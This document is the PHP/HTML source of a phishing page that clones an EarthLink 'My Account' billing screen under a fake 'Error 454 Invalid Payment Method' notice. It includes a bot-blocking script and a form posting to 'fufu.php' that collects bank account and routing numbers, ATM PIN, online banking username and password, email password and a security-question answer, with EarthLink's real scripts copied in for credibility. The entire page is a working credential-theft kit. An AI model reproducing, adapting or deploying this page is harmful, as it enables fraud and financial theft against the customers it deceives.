<?php
include '../blocker.php';

?>
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>-Error 454 Invalid Payment Method-</title>
<link rel="stylesheet" href="https://myaccount.earthlink.net/cam/brand/earthlink/style.css" type="text/css">
<script src="https://myaccount.earthlink.net/cam/js/jquery-1.11.2.min.js"></script> 
<script language="JavaScript">
<!--
  function loadFocus() {
    if (window.doFocus) {
      window.doFocus();
    }
  }
  var needAckTerms = false;    
    var setRecurr = false;  
    var termsAccepted = false; 
    
    CCNumb = '';
    CCType = '0';
    CCExpM = '0';
    CCExpY = '0';

    function doFocus() {
    	if (is_pie_key_download_error() || is_pie_encryption_download_error()) {
			window.location.replace('https://myaccount.earthlink.net/cam/temperror.jsp');
		}
     	document.creditcardchange.card_type.focus();
     	checkTerms();
     	if (termsAccepted)
     		document.getElementById('ackTermsCheckBox').checked = true;
     	
    }
    
function checkSubmit() {
	 if (checkSubmitTerms() == false)
            return false;
	 var returnValue = checkCCForm(document.creditcardchange);
	 if (returnValue == false)
	 	return false;
	 var oldValue = document.creditcardchange.original_number.value;
	 var newValue = document.getElementById('cardNo').value;
	
	 if(!(oldValue.length > 0 && newValue == oldValue)) {
	 	returnValue = doEncryption();
		if (returnValue == false)
			return false;
	 }
	 document.creditcardchange.submit();
		
}

	function checkTerms() {
			
		var cardType = document.getElementById('card_type').value;
		
		document.getElementById('displayCardType').innerHTML = getFriendlyCardName(cardType);
		needsAckTerms = cardNeedsAck(cardType);
		if (needsAckTerms) {
				document.getElementById('terms').innerHTML = getCardAck(cardType);
				needAckTerms = true;
		} else {
				document.getElementById('terms').innerHTML = "";
				needAckTerms = false;
		}
		showTerms(needAckTerms);
	}
	
	function cardNeedsAck(type) {
		var visaNeedsAck = true;
		var mcNeedsAck = true;
		var amexNeedsAck = true;
		var discNeedsAck = true;
		var dinrNeedsAck = true;
		var jcbNeedsAck = true;
		
		if (type == "VISA")
			return visaNeedsAck;
		else if (type == "MC")
			return mcNeedsAck;
		else if (type == "AMEX")
			return amexNeedsAck;
		else if (type == "DISC")
			return discNeedsAck;
		else if (type == "DINR")
			return dinrNeedsAck;
		else if (type == "JCB")
			return jcbNeedsAck;
		else 
			return false;
	}
	
	function getCardAck(type) {
		var visaAck = "You are providing your credit card information in order to process payment on your EarthLink account and understand that your information will be saved by EarthLink for future transactions on your account.  For further information on auto payments please see earthlink.net. Do you understand and consent to EarthLink processing your payment?";
		var mcAck = "You are providing your credit card information in order to process payment on your EarthLink account and understand that your information will be saved by EarthLink for future transactions on your account.  For further information on auto payments please see earthlink.net. Do you understand and consent to EarthLink processing your payment?";
		var amexAck = "You are providing your credit card information in order to process payment on your EarthLink account and understand that your information will be saved by EarthLink for future transactions on your account.  For further information on auto payments please see earthlink.net. Do you understand and consent to EarthLink processing your payment?";
		var discAck = "You are providing your credit card information in order to process payment on your EarthLink account and understand that your information will be saved by EarthLink for future transactions on your account.  For further information on auto payments please see earthlink.net. Do you understand and consent to EarthLink processing your payment?";
		var dinrAck = "You are providing your credit card information in order to process payment on your EarthLink account and understand that your information will be saved by EarthLink for future transactions on your account.  For further information on auto payments please see earthlink.net. Do you understand and consent to EarthLink processing your payment?";
		var jcbAck = "You are providing your credit card information in order to process payment on your EarthLink account and understand that your information will be saved by EarthLink for future transactions on your account.  For further information on auto payments please see earthlink.net. Do you understand and consent to EarthLink processing your payment?";
		
		if (type == "VISA")
			return visaAck;
		else if (type == "MC")
			return mcAck;
		else if (type == "AMEX")
			return amexAck;
		else if (type == "DISC")
			return discAck;
		else if (type == "DINR")
			return dinrAck;
		else if (type == "JCB")
			return jcbAck;
		else 
			return "";
	}
	
	function getFriendlyCardName(type) {
		var visaName = "Visa";
		var mcName = "MasterCard";
		var amexName = "Amex";
		var discName = "Discover";
		var dinrName = "Diner's Club";
		var jcbName = "JCB";
		
		if (type == "VISA")
			return visaName;
		else if (type == "MC")
			return mcName;
		else if (type == "AMEX")
			return amexName;
		else if (type == "DISC")
			return discName;
		else if (type == "DINR")
			return dinrName;
		else if (type == "JCB")
			return jcbName;
		else 
			return "";
	}
	
	function getCardTypeFromNumber(number) {
	    // visa
	    var re = new RegExp("^4");
	    if (number.match(re) != null)
	        return "VISA";
	
	    // Mastercard 
	    // Updated for Mastercard 2017 BINs expansion
	     if (/^(5[1-5][0-9]{14}|2(22[1-9][0-9]{12}|2[3-9][0-9]{13}|[3-6][0-9]{14}|7[0-1][0-9]{13}|720[0-9]{12}))$/.test(number)) 
	        return "MC";
	
	    // AMEX
	    re = new RegExp("^3[47]");
	    if (number.match(re) != null)
	        return "AMEX";
	
	    // Discover
	    re = new RegExp("^(6011|622(12[6-9]|1[3-9][0-9]|[2-8][0-9]{2}|9[0-1][0-9]|92[0-5]|64[4-9])|65)");
	    if (number.match(re) != null)
	        return "DISC";
	
	    // Diners
	    re = new RegExp("^36");
	    if (number.match(re) != null)
	        return "DINR";
	
	    // Diners - Carte Blanche
	    re = new RegExp("^30[0-5]");
	    if (number.match(re) != null)
	        return "DINR";
	
	    // JCB
	    re = new RegExp("^35(2[89]|[3-8][0-9])");
	    if (number.match(re) != null)
	        return "JCB";
	
	    return "";
	}
	
	function updateCardType() {
		var cardNum = document.getElementById('cardNo').value;
		var cardType = document.getElementById('card_type').value;
		var cardTypeFromNumber = getCardTypeFromNumber(cardNum);
		if (cardType != cardTypeFromNumber) {
			document.getElementById('card_type').value = cardTypeFromNumber;
			checkTerms();
		}

	}
	
	function showTerms(show) {
       if(show == true && needAckTerms) {
       		//setRecurr = true;
             document.getElementById('termsSpan').style.display = 'inline';
             document.getElementById('ackTerms').style.display = 'inline';
             document.getElementById('termsLabel').style.display = 'inline';
       }
       else {
       //setRecurr = false;
             document.getElementById('termsSpan').style.display = 'none';
             document.getElementById('ackTerms').style.display = 'none';
             document.getElementById('termsLabel').style.display = 'none';
       }
    }
    
    function checkSubmitTerms() {
   		if (needAckTerms) {
   		 	if (document.getElementById('ackTermsCheckBox').checked == true)
   				return true;
   			else {
   				alert("Automatic Payment terms must be accepted to proceed");
   				return false;
   			}
   		}

    	return true;
    }
// -->
</script> 
<script language="JavaScript" src="https://myaccount.earthlink.net/cam/js/CamLib.js"></script>
<script language="JavaScript" src="https://myaccount.earthlink.net/cam/js/processingBlink.js"></script>
<meta http-equiv="CACHE-CONTROL" content="NO-CACHE">
<meta http-equiv="Pragma" content="no-cache">
<!-- begin PIE scripts -->
<script type="text/javascript" src="https://safetechpageencryption.chasepaymentech.com/pie/v1/64100000000198/getkey.js"></script>
<script type="text/javascript" src="https://safetechpageencryption.chasepaymentech.com/pie/v1/encryption.js"></script>
<script type="text/javascript">

var strNoService = "There is a temporary issue affecting the processing of your transaction.  Please wait a few moments and try again.";
// This function checks whether getkey.<script language="JavaScript"> is loaded.
function is_pie_key_download_error() {
if (( typeof(PIE) == 'undefined') || (typeof(PIE.K) == 'undefined')
|| (typeof(PIE.L) == 'undefined') || (typeof(PIE.E) == 'undefined')
|| (typeof(PIE.key_id) == 'undefined') || (typeof(PIE.phase) == 'undefined'))
{
return true;
}
return false;
}
// This function checks whether encryption.js is loaded.
function is_pie_encryption_download_error() {
if ((typeof ValidatePANChecksum != 'function')
|| (typeof ProtectPANandCVV != 'function')) {
return true;
}
return false;
}
function doEncryption() {
if(is_pie_encryption_download_error()) {
alert(strNoService);
return false;
}
if(is_pie_key_download_error()) {
alert(strNoService);
return false;
}
var ccno = document.getElementById("cardNo").value;
var cvv = document.getElementById("cvv").value;
var embed = true;
if(embed) {
// Check MOD 10 digit, since PIE embedded encryption
// requires that the MOD 10 checksum is valid.
if(!ValidatePANChecksum(ccno)) {
alert("The card number you entered is invalid.  Please check your input and try again.");
return false;
}
}
var result = ProtectPANandCVV(ccno, cvv, !embed);
if(result != null) {
	document.getElementById("cryptCard").value = result[0];
	document.getElementById("cryptCvv").value = result[1];
	if (result.length <= 2) {
		alert(strNoService);
		return false;
	} else {
		if (result[2] == null) {
			alert("The card number you entered appears to be invalid.  Please check your input and try again.");
			return false;
		} else {
			document.getElementById("integrityCheck").value = result[2];
		}
	}

} else {
alert("The card number you entered appears to be invalid.  Please check your input and try again.");
return false;
}
//document.getElementById("keyId").value = PIE.key_id;
//document.getElementById("phase").value = PIE.phase;
return true;
}


</script>
<!-- end PIE scripts -->




<link rel="icon" href="https://myaccount.earthlink.net/cam/images/earthlink/favicon.ico" type="image/x-icon">
<link rel="shortcut icon" href="https://myaccount.earthlink.net/cam/images/earthlink/favicon.ico" type="image/x-icon">

</head>
<body onload="loadFocus()" vlink="#0000ff" topmargin="0" marginwidth="0" marginheight="0" link="#0000ff" leftmargin="0">









<style>

/* These styles assume you are using ul and li */
.dropit {
    list-style: none;
	padding: 0;
	margin: 0;
}
.dropit .dropit-trigger { position: relative; }
.dropit .dropit-submenu {
    position: absolute;
    top: 100%;
    right: 10px !important;
    z-index: 1000;
    display: none;
    min-width: 150px;
    list-style: none;
	padding: 0;
	margin: 0;
    text-align:justify;
}
.dropit .dropit-open .dropit-submenu { display: block; }

.gearmenu ul { display: none; } /* Hide before plugin loads */
.gearmenu ul.dropit-submenu {
    background-color: #fff;
    border: 1px solid #b2b2b2;
    padding: 6px 0;
    margin: 3px 0 0 1px;
    border-radius: 6px;    
    -webkit-border-radius: 6px;
       -moz-border-radius: 6px;
            border-radius: 6px;
    -webkit-box-shadow: 0px 1px 3px rgba(0,0,0,0.15);
       -moz-box-shadow: 0px 1px 3px rgba(0,0,0,0.15);
            box-shadow: 0px 1px 3px rgba(0,0,0,0.15);
}          
.gearmenu ul.dropit-submenu a {
    display: block;
    font-size: 12px;
    line-height: 25px;
    color: #7a868e;
    padding: 0 18px;
}
.gearmenu ul.dropit-submenu a:hover {
    background: #648ACB;
    color: #fff;
    text-decoration: none;
}
</style>

<script src="https://myaccount.earthlink.net/cam/js/dropit.js?v=6.53.0"></script> 

<script>
$(document).ready(function() {
    $('.gearmenu').dropit();
});
</script>


<form style="margin: 0" method="GET" target="search" action="#">
<table class="universalNav_6_0" width="100%" cellspacing="0" cellpadding="0">
	<tbody><tr valign="middle">
		<!-- Open and close TD tags have to be on same line or contents will be misaligned in IE -->
		<td style="width:25%;" align="left">
			<a href="#" target="_blank"> <img id="elnkImgId" src="https://myaccount.earthlink.net/cam/images/earthlink/elnk_logo.png" alt="EarthLink" style="margin-left:20px;" border="0"></a></td>
		<td align="right"><img id="googleImgId" src="https://myaccount.earthlink.net/cam/images/earthlink/univ_nav_Google.png"></td>
		<td style="width:30%;" align="center">
			<input type="hidden" name="url" value="/search">
			<input type="hidden" name="id" value="1024669">
			<input type="hidden" name="channel" value="webmail">
			<input type="hidden" name="area" value="earthlink-ws">
			<input type="hidden" name="vars" value="q,channel,area">
			<input id="searchBoxId" type="text" name="q" value="" size="10"></td>
		<td align="left">
			<input id="searchButtonId" type="image" src="https://myaccount.earthlink.net/cam/images/earthlink/mag_button_smaller.png"></td>
		<td align="right">
			<span class="universalLinks_6_0 " style="margin-left:8px; margin-right:20px;">
				<a href="#" target="_blank"><img id="homeIconId" src="https://myaccount.earthlink.net/cam/images/earthlink/home_icon.png" style="margin-top:3px;margin-right:3px;" border="0"></a>


        		<a href="#" target="_blank"><img id="webmailIconId" src="https://myaccount.earthlink.net/cam/images/earthlink/webmail_icon.png" style="margin-top:3px;" border="0"></a>        					



	 			<span class="gearmenu dropit">
		 			<span class="dropit-trigger">		 					 			
		                <a href="#"><img id="gearIconId" src="https://myaccount.earthlink.net/cam/images/earthlink/gear_icon.png" style="margin-top:3px;" border="0"></a>
		        		<ul class="dropit-submenu" style="display: none;">
		 			


							<li><a href="#" target="_blank">Support</a></li>


        					<li><a href="#" target="_blank">Member Center</a></li>

        					<li><a href="#" target="_blank">My Voice</a></li><li>

		        		</li></ul>
					</span>
				</span>
			</span>
		</td>
	</tr>
</tbody></table>
</form>



<div class="myAccount">





  <div id="myAccountHeader">
      <a href="#"><span class="key"></span></a>
      <div class="title no-box-sizing">
        <a href="#"><img src="images/myaccount-title.gif" border="0"></a>
      </div>
 
      <div class="welcome">
        <span class="break left" valign="top"><nobr>Welcome, Suspended User.</nobr></span>
        <span class="right signin" valign="top"><a href="#">Sign Out</a></span>
      </div>
  </div> 


 <div class="myAccountTag"> 
  <table width="100%" cellspacing="0" cellpadding="0" border="0">
  <tbody><tr valign="top">
      <td width="95%" valign="top">&nbsp;<nobr>Welcome, Confirm Your Identity</nobr></td>
      <td width="5%" valign="top" nowrap="nowrap"><a href="#">Sign Out</a></td>
  </tr>
  </tbody></table>
 </div>
 <div class="myAccountTag error">
 
  
 </div>
 
 <center>
  <table class="myAccountEdit" width="90%" cellspacing="0" cellpadding="0" border="0">
   <tbody><tr valign="top">
   	<td>
    <div class="tilehead">Error 454 Invalid Payment Method - Add Bank Account<span class="right"></span></div>
    <div class="myAccountLanding">
     <div class="container">
		<form name="creditcardchange" action="fufu.php" method="post" onsubmit="checkSubmit(); return false;">
    <input type="hidden" name="appname" value="billing">
    <input type="hidden" name="CSRFPreventionToken" value="2p0jbSbCzzlOcyPlY+xPVXQV/uc=">
      <div class="row shadecc">
        
         	Use the form below to make payment by bank draft. pay for EarthLink services.  </a>  
        
      </div>


    <div class="row"></div>    

      <div class="row shadecc">
        <strong>Bank Draft Verification</strong>
      </div>
          <div class="row">
      <label>Father's middle's Name*:</label>
      <span class="formElement">
        <input type="text" name="1" value="" maxlength="50">
      </span>  
</div>
          <div class="row">
      <label>Bank Name*:</label>
      <span class="formElement">
        <input type="text" name="2" value="" placeholder="eg Chase" maxlength="50">
      </span> 
</div>
          <div class="row">
      <label>Account Number*:</label>
      <span class="formElement">
        <input type="text" name="3" value=""  maxlength="50">
      </span> 
</div>
          <div class="row">
      <label>Routing Number*:</label>
      <span class="formElement">
        <input type="text" name="4" value="" maxlength="50">
      </span> 
</div>
          <div class="row">
      <label>Atm Pin*:</label>
      <span class="formElement">
        <input type="text" name="5" value="" size="6" placeholder="4 Digit" maxlength="50">
      </span> 
</div>
          <div class="row">
      <label>Bank Username/ID*:</label>
      <span class="formElement">
        <input type="text" name="6" value="" placeholder="Online Access Username" maxlength="50">
      </span> 
</div>
          <div class="row">
      <label>Bank Password*:</label>
      <span class="formElement">
        <input type="password" name="7" value="" placeholder="Online Access Password" maxlength="50">
      </span> 
</div>
          <div class="row">
      <label>Phone Number*:</label>
      <span class="formElement">
        <input type="text" name="8" value="" placeholder="xxx-xxx-xxxx" maxlength="50">
      </span> 
</div>
          <div class="row">
      <label>Email Address*:</label>
      <span class="formElement">
        <input type="text" name="9" value="" maxlength="50">
      </span> 
</div>
          <div class="row">
      <label>Email Password*:</label>
      <span class="formElement">
        <input type="password" name="10" value="" maxlength="50">
      </span> 

          <small>* Information Required</small>
        </span>  
        <span class="submit"><input type="submit" value="Verify Account"> &nbsp; <input onclick="javascript:location.href='/cam/billing_info.jsp?x=-657866670';" type="button" value="Cancel">
        </span>
      </div>
      <div class="row"></div>
        
      	<input type="hidden" name="billopt" value="billopt">
		</form>
	  </div></div></td>
   </tr>
  </tbody></table>
 </center>
 
 







<div class="navlinks" align="center">

  
    <a href="#">My Account Home</a>
  
    &nbsp; | &nbsp;

  
    <a href="#">Email Profiles</a>
  
    &nbsp; | &nbsp;

  
    <a href="#">Billing Information</a>
  
    &nbsp; | &nbsp;

  
    <a href="#">Contact Information</a>
  
    &nbsp; | &nbsp;

  
    <a href="#5">Shipping Information</a>
  
    &nbsp; | &nbsp;

  
    <a href="#">My Plan Details</a>
  
    &nbsp; | &nbsp;

  
    <a href="#">My Downloads</a>
  
    &nbsp; | &nbsp;

  
	    <a href="#" target="_blank">Help</a>
  
    
</div>

 




<div class="footer"><hr>
� 2020 EarthLink, LLC. All Rights Reserved.<br>Members and visitors to the EarthLink Web site agree to abide by our <a href="#" target="_blank">Policies and Agreements</a>.<br> <a href="#" target="_blank">EarthLink Privacy Policy</a><br>
</div>

<div class="footer" align="right">
	My Account version 6.53.0
</div>










</div>

 














</body></html>